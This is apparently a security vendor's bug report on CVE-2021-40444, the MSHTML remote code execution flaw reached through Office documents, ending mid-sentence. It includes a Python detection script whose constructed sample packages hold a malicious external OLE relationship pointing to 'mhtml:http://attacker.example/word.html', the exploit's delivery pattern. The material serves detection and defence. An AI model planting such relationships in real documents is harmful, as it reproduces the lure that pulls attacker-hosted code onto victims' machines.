The Bug Report | September 2021: CVE-2021-40444

Why am I here?


There’s a lot of information out there on critical vulnerabilities; this short bug report contains an overview of what we believe to be the most news and noteworthy vulnerabilities. We don’t rely on a single scoring system like CVSS to determine what you need to know about; this is all about qualitative and experience-based analysis, relying on over 100 years of combined industry experience within our team. We look at characteristics such as wormability, ubiquity of the target, likelihood of exploitation and impact. Today, we’ll be focusing on CVE-2021-40444.


CrossView: CVE-2021-40444


What is it?


CVE-2021-40444 is a remote code execution (RCE) vulnerability in MSHTML, the Internet Explorer rendering engine that Office applications such as Word, PowerPoint and Excel use to render web content. A carefully crafted document embeds an ActiveX control that points MSHTML at attacker-hosted content, which in turn pulls down a malicious Microsoft Cabinet (.cab) file; the result is arbitrary code running as the user who opened the document. Note that Office's Protected View does stop the in-the-wild exploit until the user clicks "Enable Editing", so the bug is not in Protected View itself, but users routinely click through that prompt.


Most importantly, this vulnerability is reachable not only through the applications themselves but also through the Windows Explorer preview pane, which renders documents without the user explicitly opening them.
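The delivery mechanism described above leaves a recognisable trace inside the document package: the embedded ActiveX/OLE object is declared as an external relationship whose target is an `mhtml:` URL wrapping the attacker's HTTP URL. The following script is an added example, not code from the original bug report or from McAfee; it parses the `.rels` parts of an Office Open XML file and flags any relationship with an `mhtml:` target or an externally linked OLE object. The domain `attacker.example`, the relationship IDs and the two sample packages are constructed for the demonstration.

```python
"""Triage .docx/.xlsx/.pptx packages for the CVE-2021-40444 delivery pattern.

Office Open XML files are ZIP archives; every part's links live in a sibling
"*.rels" XML file. The in-the-wild CVE-2021-40444 documents declared their
ActiveX/OLE object as an *external* relationship whose Target began with
"mhtml:http://...", so that is what this check looks for.
"""
import io
import re
import zipfile
from xml.etree import ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
)

# mhtml: wrapper around an http(s) URL, e.g.
#   mhtml:http://host/page.html!x-usc:http://host/page.html
MHTML_RE = re.compile(r"^mhtml:\s*https?://", re.IGNORECASE)


def find_suspicious_relationships(package_bytes):
    """Return (rels_part, relationship_id, target) for every suspicious link."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as archive:
        for name in archive.namelist():
            if not name.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(archive.read(name))
            except ET.ParseError:
                # A malformed rels part is itself worth a look, but keep going.
                continue
            for rel in root.iter("{%s}Relationship" % REL_NS):
                target = rel.get("Target", "")
                is_external = rel.get("TargetMode", "").lower() == "external"
                is_ole = rel.get("Type", "") == OLE_REL_TYPE
                # Flag any mhtml: target, and any OLE object that lives outside
                # the package (a benign embedded object is an internal part).
                if MHTML_RE.match(target) or (is_ole and is_external):
                    findings.append((name, rel.get("Id"), target))
    return findings


# --- Constructed samples (not real malware) --------------------------------

MALICIOUS_TARGET = (
    "mhtml:http://attacker.example/word.html!x-usc:"
    "http://attacker.example/word.html"
)

MALICIOUS_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="%s">
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
    Target="styles.xml"/>
  <Relationship Id="rId5" Type="%s" Target="%s" TargetMode="External"/>
</Relationships>""" % (REL_NS, OLE_REL_TYPE, MALICIOUS_TARGET)

BENIGN_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="%s">
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
    Target="media/image1.png"/>
  <Relationship Id="rId2" Type="%s" Target="embeddings/oleObject1.bin"/>
</Relationships>""" % (REL_NS, OLE_REL_TYPE)


def build_sample_docx(document_rels_xml):
    """Build a minimal, constructed .docx-like package in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", "<w:document/>")
        archive.writestr("word/_rels/document.xml.rels", document_rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_RELS), ("benign", BENIGN_RELS)):
        hits = find_suspicious_relationships(build_sample_docx(rels))
        print(label, "->", hits or "no suspicious relationships")
```

Run against real files with `find_suspicious_relationships(open(path, "rb").read())`. The check is deliberately narrow: it catches the external `mhtml:` OLE link used in the September 2021 campaign, not every way MSHTML can be reached from a document, so treat a clean result as "this indicator is absent", not as "the file is safe".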


Who cares?


This is a great question! Pretty much anyone who uses any Microsoft Office applications, or has them installed, should be concerned.


Office is one of the most widely-used applications on the planet. Odds are good you have it open right now. While many companies have disabled macros within Office documents at the Group Policy level, it is unlikely ActiveX is treated similarly. This means that until the patch, or Microsoft's registry workaround that disables ActiveX control installation in all Internet Explorer zones, is applied, a large proportion of Office users remain vulnerable to this exploit.


Fortunately, “spray and pray” style email campaigns are unlikely to gain traction with this exploit, as mail pro ..
